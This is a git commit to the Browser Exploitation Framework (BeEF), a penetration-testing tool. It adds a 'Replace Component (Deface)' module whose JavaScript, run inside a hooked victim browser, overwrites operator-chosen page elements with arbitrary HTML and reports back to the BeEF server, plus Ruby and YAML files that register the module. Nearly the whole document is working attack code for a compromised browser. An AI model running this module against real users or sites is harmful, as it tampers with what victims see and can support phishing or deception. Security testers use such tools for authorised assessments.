New Defacement Module - but only rewrites targeted content. #861

2013-03-25 19:33:38 +08:00
parent 7e57313e21
commit 31e1ddddaf
3 changed files with 51 additions and 0 deletions
--- a/modules/browser/hooked_domain/deface_web_page_component/command.js
+++ b/modules/browser/hooked_domain/deface_web_page_component/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = $j('<%= @deface_selector %>').each(function() {
+		$j(this).html('<%= @deface_content %>');
+	}).length;
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Defaced "+ result +" elements");
+});
--- a/modules/browser/hooked_domain/deface_web_page_component/config.yaml
+++ b/modules/browser/hooked_domain/deface_web_page_component/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        deface_web_page_component:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Replace Component (Deface)"
+            description: "Overwrite a particular component of the hooked page."
+            authors: ["antisnatchor","xntrik"]
+            target:
+                user_notify: ['ALL']
--- a/modules/browser/hooked_domain/deface_web_page_component/module.rb
+++ b/modules/browser/hooked_domain/deface_web_page_component/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Deface_web_page_component < BeEF::Core::Command
+
+  def self.options
+    return [
+		{ 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle', 'width'=>'200px' },
+		{ 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width'=>'200px' }
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+
+  end
+
+end